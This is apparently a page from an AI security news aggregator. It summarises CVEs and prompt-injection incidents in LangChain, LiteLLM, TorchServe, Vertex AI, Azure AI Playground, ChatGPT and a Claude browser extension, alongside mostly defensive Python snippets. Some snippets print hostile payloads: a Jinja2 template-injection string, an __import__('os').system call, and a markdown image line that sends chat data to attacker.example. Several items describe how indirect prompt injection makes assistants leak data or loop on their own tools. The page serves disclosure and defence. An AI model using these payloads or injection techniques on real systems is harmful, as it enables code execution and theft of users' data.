aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by Truong (Jack) Luu, Information Systems Researcher.

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

Total tracked: 3,710 · Last 24 hours: 1 · Last 7 days: 1
Daily Briefing: Friday, May 8, 2026

Critical RCE Vulnerabilities in LiteLLM Proxy Server: LiteLLM, a proxy server that forwards requests to AI model APIs, disclosed three critical and high-severity flaws in versions 1.74.2 through 1.83.6. Two test endpoints allowed attackers with valid API keys to execute arbitrary code (running any commands an attacker wants) on the server by submitting malicious configurations or prompt templates that the server rendered without sandboxing (CVE-2026-42271, CVE-2026-42203, both critical), while a SQL injection flaw (inserting malicious code into database queries) let unauthenticated attackers read or modify stored API credentials (CVE-2026-42208, high).
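
To make the unsandboxed-template class concrete, here is a minimal Python sketch (illustrative only, not LiteLLM's actual code) using Jinja2. The payload is a well-known Jinja2 SSTI pattern; whether it fires depends on the engine and version, but a sandboxed environment refuses it either way.

# Illustrative sketch of the template-injection class, not LiteLLM's code.
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment, SecurityError

# A classic attacker-supplied "prompt template" that walks Python
# internals out to the os module:
malicious = "{{ lipsum.__globals__['os'].popen('id').read() }}"

# Unsandboxed rendering would execute the attacker's expression:
# Environment().from_string(malicious).render()  # runs `id` on the host

# A sandboxed environment blocks underscore attribute access instead:
try:
    SandboxedEnvironment().from_string(malicious).render()
except SecurityError as err:
    print("blocked:", err)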


ClaudeBleed Exploit Allows Extension Hijacking in Chrome: Anthropic's Claude browser extension contains a vulnerability that allows malicious Chrome extensions to hijack it and perform unauthorized actions like exfiltrating files, sending emails, or stealing code from private repositories. The flaw stems from the extension trusting any script from claude.ai without verifying the actual caller, and while Anthropic released a partial fix in version 1.0.70 on May 6, researchers report it remains exploitable when the extension runs in privileged mode.

Latest Intel

01

CVE-2023-32786: In Langchain through 0.0.155, prompt injection allows an attacker to force the service to retrieve data from an arbitrary URL

security
Oct 20, 2023

CVE-2023-32786 is a prompt injection vulnerability (tricking an AI by hiding instructions in its input) in Langchain version 0.0.155 and earlier that allows attackers to force the service to retrieve data from any URL they choose. This could lead to SSRF (server-side request forgery, where an attacker makes a server request data from unintended locations) and potentially inject harmful content into tasks that use the retrieved data.
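
A hedged mitigation sketch for this SSRF class (the function name and allowlist are assumptions, not LangChain's fix): validate any model-influenced URL before the application fetches it.

# Assumption: your application decides which hosts retrieval may touch.
from urllib.parse import urlparse

ALLOWED_HOSTS = {"docs.example.com"}  # illustrative trusted sources

def safe_fetch_url(url: str) -> str:
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError(f"blocked scheme: {parsed.scheme!r}")
    if parsed.hostname not in ALLOWED_HOSTS:
        raise ValueError(f"blocked host: {parsed.hostname!r}")
    return url  # safe to hand to the HTTP client

safe_fetch_url("https://docs.example.com/page")       # ok
# safe_fetch_url("http://169.254.169.254/meta-data")  # raises ValueError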


AI Systems Show Triple the High-Risk Vulnerabilities of Legacy Software: Penetration testing data reveals that AI and LLM systems have 32% of findings rated high-risk compared to just 13% for traditional software, with only 38% of high-risk AI issues getting resolved. Security experts attribute this gap to rapid deployment without mature controls, novel attack surfaces like prompt injection (tricking AI by hiding instructions in input), and fragmented responsibility for remediation across teams.


Model Context Protocol Emerging as Critical Security Blind Spot: Model Context Protocol (MCP, a plugin system connecting AI agents to external tools) has become a major vulnerability vector as organizations fail to scan for or monitor MCP-related risks. Recent supply chain attacks, such as the postmark-mcp npm package that exfiltrated emails from 300 organizations, demonstrate how attackers exploit widely trusted MCP packages and hardcoded credentials in AI configurations to enable credential theft and supply chain compromises at scale.
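
As a hedged illustration of the monitoring gap, the sketch below audits an MCP client config for hardcoded credentials and unpinned package versions. The mcpServers layout mirrors common clients such as Claude Desktop, but the key names and heuristics here are assumptions.

# Hedged sketch: flag hardcoded secrets and unpinned packages in an
# MCP client config (layout and heuristics are assumptions).
import json
import re

SECRET_KEY_RE = re.compile(r"(key|token|secret|password)", re.I)

def audit_mcp_config(path: str) -> list[str]:
    findings = []
    with open(path) as f:
        cfg = json.load(f)
    for name, server in cfg.get("mcpServers", {}).items():
        # Credentials pasted straight into the config's env block:
        for var, value in server.get("env", {}).items():
            if SECRET_KEY_RE.search(var) and value:
                findings.append(f"{name}: hardcoded credential in {var}")
        # Packages pulled at launch without a pinned version:
        for arg in server.get("args", []):
            if isinstance(arg, str) and arg.endswith("@latest"):
                findings.append(f"{name}: unpinned package {arg}")
    return findings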

NVD/CVE Database
02

Google Cloud Vertex AI - Data Exfiltration Vulnerability Fixed in Generative AI Studio

security
Oct 19, 2023

Google Cloud's Vertex AI Generative AI Studio had a data exfiltration vulnerability caused by image markdown injection (a technique where attackers embed hidden commands in image references to steal data). The vulnerability was responsibly disclosed to Google and has been fixed.
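
To illustrate the technique generically (a sketch, not the Vertex AI specifics): the model is tricked into emitting a markdown image whose URL carries data, the chat UI fetches the image automatically, and the attacker's server logs the query string. A simple detector pulls every outbound image URL out of model output for review.

# Illustrative sketch of image markdown exfiltration; all URLs are fake.
import re

model_output = (
    "Here is your summary. "
    "![loading](https://attacker.example/log?d=SECRET_CHAT_DATA)"
)

# The renderer would fetch this URL automatically, leaking the query
# string. Extract image URLs before rendering to spot the attempt:
IMAGE_MD_RE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")
for url in IMAGE_MD_RE.findall(model_output):
    print("outbound image fetch:", url)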

Embrace The Red
03

CVE-2023-46229: LangChain before 0.0.317 allows SSRF via document_loaders/recursive_url_loader.py because crawling can proceed from an external server to an internal server

security
Oct 19, 2023

LangChain versions before 0.0.317 have a vulnerability called SSRF (server-side request forgery, where an attacker tricks the application into making requests to unintended servers) in its recursive URL loader component. The flaw allows web crawling to move from an external server to an internal server that should not be accessible.

Fix: Update LangChain to version 0.0.317 or later. Patches are available at https://github.com/langchain-ai/langchain/commit/9ecb7240a480720ec9d739b3877a52f76098a2b8 and https://github.com/langchain-ai/langchain/pull/11925.
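
Conceptually, the fix constrains where the crawl may go. A minimal sketch of that idea (not the actual patch code): resolve each discovered link and drop any that leave the host the crawl started on.

# Sketch of a same-host crawl guard, in the spirit of the fix.
from urllib.parse import urljoin, urlparse

def same_host_links(base_url: str, hrefs: list[str]) -> list[str]:
    base_host = urlparse(base_url).hostname
    safe = []
    for href in hrefs:
        target = urljoin(base_url, href)  # resolve relative links
        if urlparse(target).hostname == base_host:
            safe.append(target)
    return safe

print(same_host_links("https://docs.example.com/a",
                      ["/b", "https://internal.corp/admin"]))
# -> ['https://docs.example.com/b']  (the internal link is dropped)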

NVD/CVE Database
04

CVE-2023-45063: Cross-Site Request Forgery (CSRF) vulnerability in ReCorp AI Content Writing Assistant (Content Writer, GPT 3 & 4, ChatGPT, Image Generator) plugin <= 1.1.5 versions

security
Oct 12, 2023

A CSRF vulnerability (cross-site request forgery, where an attacker tricks a user into performing unwanted actions on a website they're logged into) was found in the ReCorp AI Content Writing Assistant plugin for WordPress in versions 1.1.5 and earlier. This flaw could allow attackers to exploit users of the plugin without their knowledge.
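
For readers unfamiliar with the defense whose absence CSRF exploits, here is a generic Python sketch (framework and names are illustrative, unrelated to the plugin's code): a per-session secret token that every state-changing request must echo back, which a cross-site attacker cannot read.

# Generic CSRF-token check; session handling is simplified for the sketch.
import hmac
import secrets

session = {"csrf_token": secrets.token_hex(32)}  # issued with the form

def handle_post(form: dict) -> str:
    submitted = form.get("csrf_token", "")
    # Constant-time comparison of the echoed token:
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return "403: request did not originate from our form"
    return "200: action performed"

print(handle_post({"csrf_token": session["csrf_token"]}))  # legitimate
print(handle_post({}))  # forged cross-site request is rejected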

NVD/CVE Database
05

CVE-2023-44467: langchain_experimental (aka LangChain Experimental) in LangChain before 0.0.306 allows an attacker to bypass the CVE-2023-36258 fix and execute arbitrary code via the __import__ function, which pal_chain/base.py failed to block

security
Oct 9, 2023

CVE-2023-44467 is a vulnerability in LangChain Experimental (a library for building AI applications) before version 0.0.306 that allows attackers to bypass a previous security fix and run arbitrary code (unauthorized commands) on a system using the __import__ function in Python, which the pal_chain/base.py file failed to block.

Fix: Upgrade LangChain to version 0.0.306 or later. A patch is available at https://github.com/langchain-ai/langchain/commit/4c97a10bd0d9385cfee234a63b5bd826a295e483.
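
The bypass works because __import__('os') is an ordinary function call, not an import statement, so a check that only rejects import nodes misses it. A sketch of a check that catches both, in the spirit of the patch rather than its literal code:

# AST-level check rejecting both import statements and __import__ calls.
import ast

payload = "__import__('os').system('id')"

def uses_imports(source: str) -> bool:
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            return True
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Name)
                and node.func.id == "__import__"):
            return True
    return False

print(uses_imports("import os"))  # True: caught by an import-node check too
print(uses_imports(payload))      # True: the call the old check missed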

NVD/CVE Database
06

Microsoft Fixes Data Exfiltration Vulnerability in Azure AI Playground

security
Sep 29, 2023

LLM applications like chatbots are vulnerable to data exfiltration (unauthorized data theft) through image markdown injection, a technique where attackers embed hidden instructions in untrusted data to make the AI generate image tags that leak information. Microsoft patched this vulnerability in Azure AI Playground, though the source does not describe the specific technical details of their fix.
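
Since the source does not describe Microsoft's fix, here is one plausible mitigation shape (an assumption, not the disclosed fix): sanitize model output before rendering, keeping image markdown only when the image host is allowlisted.

# Hypothetical output sanitizer; host list and names are assumptions.
import re
from urllib.parse import urlparse

TRUSTED_IMAGE_HOSTS = {"cdn.example.com"}
IMAGE_MD_RE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)\)")

def sanitize_images(markdown: str) -> str:
    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        if urlparse(url).hostname in TRUSTED_IMAGE_HOSTS:
            return match.group(0)  # trusted image passes through
        return f"[image removed: untrusted host] {alt}"
    return IMAGE_MD_RE.sub(replace, markdown)

print(sanitize_images("![x](https://attacker.example/log?d=secret)"))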

Embrace The Red
07

CVE-2023-43654: TorchServe is a tool for serving and scaling PyTorch models in production. TorchServe default configuration lacks proper input validation, enabling third parties to invoke remote HTTP download requests and write files to disk

security
Sep 28, 2023

TorchServe (a tool for running PyTorch machine learning models as web services) has a vulnerability in its default configuration that fails to validate user inputs properly, allowing attackers to download files from any URL and save them to the server's disk. This could let attackers damage the system or steal sensitive information, affecting versions 0.1.0 through 0.8.1.

Fix: Upgrade to TorchServe release 0.8.2 or later, which includes a warning when the default value for allowed_urls is used. Users should also configure the allowed_urls setting and specify which model URLs are permitted.
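
allowed_urls in TorchServe's config.properties takes a comma-separated list of regular expressions for permitted model archive URLs. A Python sketch of the gate such a setting implies (illustrative, not TorchServe's implementation; the host is an assumption):

# Emulation of a regex-allowlist URL gate like allowed_urls.
import re

allowed_urls = [r"https://models\.example\.com/.*"]  # your trusted host

def url_allowed(url: str) -> bool:
    return any(re.fullmatch(pattern, url) for pattern in allowed_urls)

print(url_allowed("https://models.example.com/resnet.mar"))  # True
print(url_allowed("https://attacker.example/evil.mar"))      # False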

NVD/CVE Database
08

Advanced Data Exfiltration Techniques with ChatGPT

security
Sep 28, 2023

An indirect prompt injection attack (tricking an AI into following hidden instructions in its input) can allow an attacker to steal chat data from ChatGPT users by either having the AI embed information into image URLs (image markdown injection, which embeds data into web links displayed as images) or convincing users to click malicious links. ChatGPT Plugins, which are add-ons that extend ChatGPT's functionality, create additional exfiltration risks because they have minimal security review before being deployed.

Embrace The Red
09

HITCON CMT 2023 - LLM Security Presentation and Trip Report

security, research
Sep 18, 2023

This article is a trip report from HITCON CMT 2023, a security conference in Taiwan, where the author attended talks on various topics including LLM security, reverse engineering with AI, and application exploits. Key presentations covered indirect prompt injections (attacks where malicious instructions are hidden in data fed to an AI system), Electron app vulnerabilities, and PHP security issues. The author gave a talk on indirect prompt injections and notes this technique could become a significant attack vector for AI-integrated applications like chatbots.

Embrace The Red
10

LLM Apps: Don't Get Stuck in an Infinite Loop! 💵💰

security, safety
Sep 16, 2023

An attacker can use indirect prompt injection (tricking an AI by hiding malicious instructions in data it reads) to make an LLM call its own tools or plugins repeatedly in a loop, potentially increasing costs or disrupting service. While ChatGPT users are mostly protected by subscription pricing, call limits, and a manual stop button, this technique demonstrates a real vulnerability in how LLM applications handle recursive tool calls.
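
A hedged sketch of the corresponding guard for any LLM app (all names are illustrative): hard-cap the number of tool calls a single request may trigger, so an injected "call the tool again" instruction cannot spin indefinitely.

# Budget guard for agent tool loops; the agent plumbing is faked below.
MAX_TOOL_CALLS = 10

def run_agent_loop(get_next_tool_call, execute_tool):
    """get_next_tool_call() returns a tool-call dict, or None when done."""
    calls = 0
    while (call := get_next_tool_call()) is not None:
        calls += 1
        if calls > MAX_TOOL_CALLS:
            raise RuntimeError("tool-call budget exceeded; stopping loop")
        execute_tool(call)
    return calls

# A model stuck in a loop keeps requesting the same tool forever:
looping_model = iter(lambda: {"tool": "search", "args": {}}, None)
try:
    run_agent_loop(lambda: next(looping_model), lambda call: None)
except RuntimeError as err:
    print(err)  # -> tool-call budget exceeded; stopping loop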

Embrace The Red